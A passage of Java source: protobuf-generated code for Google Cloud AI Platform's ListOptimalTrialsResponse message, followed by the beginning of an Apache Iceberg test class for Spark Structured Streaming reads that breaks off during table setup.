pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloud.aiplatform.v1.Trial> getOptimalTrialsList() { return optimalTrials_; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. 
* https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.aiplatform.v1.TrialOrBuilder> getOptimalTrialsOrBuilderList() { return optimalTrials_; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public int getOptimalTrialsCount() { return optimalTrials_.size(); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1.Trial getOptimalTrials(int index) { return optimalTrials_.get(index); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. 
* https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1.TrialOrBuilder getOptimalTrialsOrBuilder(int index) { return optimalTrials_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < optimalTrials_.size(); i++) { output.writeMessage(1, optimalTrials_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < optimalTrials_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, optimalTrials_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse)) { return super.equals(obj); } com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse other = (com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse) obj; if (!getOptimalTrialsList().equals(other.getOptimalTrialsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getOptimalTrialsCount() > 0) { hash = (37 * hash) + OPTIMAL_TRIALS_FIELD_NUMBER; hash = (53 * hash) + getOptimalTrialsList().hashCode(); } hash = (29 * hash) + 
getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return 
com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for * [VizierService.ListOptimalTrials][google.cloud.aiplatform.v1.VizierService.ListOptimalTrials]. 
* </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ListOptimalTrialsResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1.ListOptimalTrialsResponse) com.google.cloud.aiplatform.v1.ListOptimalTrialsResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.class, com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.Builder.class); } // Construct using com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (optimalTrialsBuilder_ == null) { optimalTrials_ = java.util.Collections.emptyList(); } else { optimalTrials_ = null; optimalTrialsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_descriptor; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.getDefaultInstance(); } @java.lang.Override public 
com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse build() { com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse buildPartial() { com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse result = new com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse result) { if (optimalTrialsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { optimalTrials_ = java.util.Collections.unmodifiableList(optimalTrials_); bitField0_ = (bitField0_ & ~0x00000001); } result.optimalTrials_ = optimalTrials_; } else { result.optimalTrials_ = optimalTrialsBuilder_.build(); } } private void buildPartial0(com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return 
super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse) { return mergeFrom((com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse other) { if (other == com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.getDefaultInstance()) return this; if (optimalTrialsBuilder_ == null) { if (!other.optimalTrials_.isEmpty()) { if (optimalTrials_.isEmpty()) { optimalTrials_ = other.optimalTrials_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureOptimalTrialsIsMutable(); optimalTrials_.addAll(other.optimalTrials_); } onChanged(); } } else { if (!other.optimalTrials_.isEmpty()) { if (optimalTrialsBuilder_.isEmpty()) { optimalTrialsBuilder_.dispose(); optimalTrialsBuilder_ = null; optimalTrials_ = other.optimalTrials_; bitField0_ = (bitField0_ & ~0x00000001); optimalTrialsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? 
getOptimalTrialsFieldBuilder() : null; } else { optimalTrialsBuilder_.addAllMessages(other.optimalTrials_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.aiplatform.v1.Trial m = input.readMessage( com.google.cloud.aiplatform.v1.Trial.parser(), extensionRegistry); if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.add(m); } else { optimalTrialsBuilder_.addMessage(m); } break; } // case 10 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.aiplatform.v1.Trial> optimalTrials_ = java.util.Collections.emptyList(); private void ensureOptimalTrialsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { optimalTrials_ = new java.util.ArrayList<com.google.cloud.aiplatform.v1.Trial>(optimalTrials_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Trial, com.google.cloud.aiplatform.v1.Trial.Builder, com.google.cloud.aiplatform.v1.TrialOrBuilder> optimalTrialsBuilder_; /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. 
* https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public java.util.List<com.google.cloud.aiplatform.v1.Trial> getOptimalTrialsList() { if (optimalTrialsBuilder_ == null) { return java.util.Collections.unmodifiableList(optimalTrials_); } else { return optimalTrialsBuilder_.getMessageList(); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public int getOptimalTrialsCount() { if (optimalTrialsBuilder_ == null) { return optimalTrials_.size(); } else { return optimalTrialsBuilder_.getCount(); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.Trial getOptimalTrials(int index) { if (optimalTrialsBuilder_ == null) { return optimalTrials_.get(index); } else { return optimalTrialsBuilder_.getMessage(index); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. 
* https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder setOptimalTrials(int index, com.google.cloud.aiplatform.v1.Trial value) { if (optimalTrialsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureOptimalTrialsIsMutable(); optimalTrials_.set(index, value); onChanged(); } else { optimalTrialsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder setOptimalTrials( int index, com.google.cloud.aiplatform.v1.Trial.Builder builderForValue) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.set(index, builderForValue.build()); onChanged(); } else { optimalTrialsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addOptimalTrials(com.google.cloud.aiplatform.v1.Trial value) { if (optimalTrialsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureOptimalTrialsIsMutable(); optimalTrials_.add(value); onChanged(); } else { optimalTrialsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. 
* https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addOptimalTrials(int index, com.google.cloud.aiplatform.v1.Trial value) { if (optimalTrialsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureOptimalTrialsIsMutable(); optimalTrials_.add(index, value); onChanged(); } else { optimalTrialsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addOptimalTrials(com.google.cloud.aiplatform.v1.Trial.Builder builderForValue) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.add(builderForValue.build()); onChanged(); } else { optimalTrialsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addOptimalTrials( int index, com.google.cloud.aiplatform.v1.Trial.Builder builderForValue) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.add(index, builderForValue.build()); onChanged(); } else { optimalTrialsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. 
* https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addAllOptimalTrials( java.lang.Iterable<? extends com.google.cloud.aiplatform.v1.Trial> values) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, optimalTrials_); onChanged(); } else { optimalTrialsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder clearOptimalTrials() { if (optimalTrialsBuilder_ == null) { optimalTrials_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { optimalTrialsBuilder_.clear(); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder removeOptimalTrials(int index) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.remove(index); onChanged(); } else { optimalTrialsBuilder_.remove(index); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. 
* https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.Trial.Builder getOptimalTrialsBuilder(int index) { return getOptimalTrialsFieldBuilder().getBuilder(index); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.TrialOrBuilder getOptimalTrialsOrBuilder(int index) { if (optimalTrialsBuilder_ == null) { return optimalTrials_.get(index); } else { return optimalTrialsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public java.util.List<? extends com.google.cloud.aiplatform.v1.TrialOrBuilder> getOptimalTrialsOrBuilderList() { if (optimalTrialsBuilder_ != null) { return optimalTrialsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(optimalTrials_); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. 
* https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.Trial.Builder addOptimalTrialsBuilder() { return getOptimalTrialsFieldBuilder() .addBuilder(com.google.cloud.aiplatform.v1.Trial.getDefaultInstance()); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.Trial.Builder addOptimalTrialsBuilder(int index) { return getOptimalTrialsFieldBuilder() .addBuilder(index, com.google.cloud.aiplatform.v1.Trial.getDefaultInstance()); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. 
* https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public java.util.List<com.google.cloud.aiplatform.v1.Trial.Builder> getOptimalTrialsBuilderList() { return getOptimalTrialsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Trial, com.google.cloud.aiplatform.v1.Trial.Builder, com.google.cloud.aiplatform.v1.TrialOrBuilder> getOptimalTrialsFieldBuilder() { if (optimalTrialsBuilder_ == null) { optimalTrialsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Trial, com.google.cloud.aiplatform.v1.Trial.Builder, com.google.cloud.aiplatform.v1.TrialOrBuilder>( optimalTrials_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); optimalTrials_ = null; } return optimalTrialsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1.ListOptimalTrialsResponse) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1.ListOptimalTrialsResponse) private static final com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse(); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListOptimalTrialsResponse> PARSER = new com.google.protobuf.AbstractParser<ListOptimalTrialsResponse>() { @java.lang.Override public ListOptimalTrialsResponse parsePartialFrom( com.google.protobuf.CodedInputStream 
input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListOptimalTrialsResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListOptimalTrialsResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/iceberg
35,738
spark/v3.4/spark/src/test/java/org/apache/iceberg/spark/source/TestStructuredStreamingRead3.java
/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package org.apache.iceberg.spark.source;

import static org.apache.iceberg.expressions.Expressions.ref;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.assertThatThrownBy;

import java.io.File;
import java.io.IOException;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.concurrent.TimeoutException;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.stream.IntStream;
import org.apache.iceberg.BaseTable;
import org.apache.iceberg.DataFile;
import org.apache.iceberg.DataFiles;
import org.apache.iceberg.DataOperations;
import org.apache.iceberg.DeleteFile;
import org.apache.iceberg.FileFormat;
import org.apache.iceberg.Files;
import org.apache.iceberg.ParameterizedTestExtension;
import org.apache.iceberg.RewriteFiles;
import org.apache.iceberg.Schema;
import org.apache.iceberg.Snapshot;
import org.apache.iceberg.Table;
import org.apache.iceberg.TableMetadata;
import org.apache.iceberg.TableOperations;
import org.apache.iceberg.TestHelpers;
import org.apache.iceberg.data.FileHelpers;
import org.apache.iceberg.data.GenericRecord;
import org.apache.iceberg.data.Record;
import org.apache.iceberg.expressions.Expressions;
import org.apache.iceberg.relocated.com.google.common.collect.ImmutableMap;
import org.apache.iceberg.relocated.com.google.common.collect.Iterables;
import org.apache.iceberg.relocated.com.google.common.collect.Lists;
import org.apache.iceberg.spark.CatalogTestBase;
import org.apache.iceberg.spark.SparkReadOptions;
import org.apache.spark.api.java.function.VoidFunction2;
import org.apache.spark.sql.Dataset;
import org.apache.spark.sql.Encoders;
import org.apache.spark.sql.Row;
import org.apache.spark.sql.internal.SQLConf;
import org.apache.spark.sql.streaming.DataStreamWriter;
import org.apache.spark.sql.streaming.OutputMode;
import org.apache.spark.sql.streaming.StreamingQuery;
import org.apache.spark.sql.streaming.Trigger;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeAll;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.TestTemplate;
import org.junit.jupiter.api.extension.ExtendWith;

/**
 * Tests for Spark Structured Streaming reads from Iceberg tables: multi-snapshot reads, read
 * limits (max files/rows per micro-batch), timestamp-based start offsets, checkpoint recovery,
 * Trigger.AvailableNow semantics, and handling of non-append snapshot types.
 */
@ExtendWith(ParameterizedTestExtension.class)
public final class TestStructuredStreamingRead3 extends CatalogTestBase {
  private Table table;

  // Counts micro-batches observed by foreachBatch sinks; reset before each test.
  private final AtomicInteger microBatches = new AtomicInteger();

  /**
   * test data to be used by multiple writes each write creates a snapshot and writes a list of
   * records
   */
  private static final List<List<SimpleRecord>> TEST_DATA_MULTIPLE_SNAPSHOTS =
      Lists.newArrayList(
          Lists.newArrayList(
              new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")),
          Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five")),
          Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven")));

  /**
   * test data - to be used for multiple write batches each batch inturn will have multiple
   * snapshots
   */
  private static final List<List<List<SimpleRecord>>> TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS =
      Lists.newArrayList(
          Lists.newArrayList(
              Lists.newArrayList(
                  new SimpleRecord(1, "one"),
                  new SimpleRecord(2, "two"),
                  new SimpleRecord(3, "three")),
              Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five"))),
          Lists.newArrayList(
              Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven")),
              Lists.newArrayList(new SimpleRecord(8, "eight"), new SimpleRecord(9, "nine"))),
          Lists.newArrayList(
              Lists.newArrayList(
                  new SimpleRecord(10, "ten"),
                  new SimpleRecord(11, "eleven"),
                  new SimpleRecord(12, "twelve")),
              Lists.newArrayList(
                  new SimpleRecord(13, "thirteen"), new SimpleRecord(14, "fourteen")),
              Lists.newArrayList(
                  new SimpleRecord(15, "fifteen"), new SimpleRecord(16, "sixteen"))));

  @BeforeAll
  public static void setupSpark() {
    // disable AQE as tests assume that writes generate a particular number of files
    spark.conf().set(SQLConf.ADAPTIVE_EXECUTION_ENABLED().key(), "false");
  }

  @BeforeEach
  public void setupTable() {
    sql(
        "CREATE TABLE %s "
            + "(id INT, data STRING) "
            + "USING iceberg "
            + "PARTITIONED BY (bucket(3, id)) "
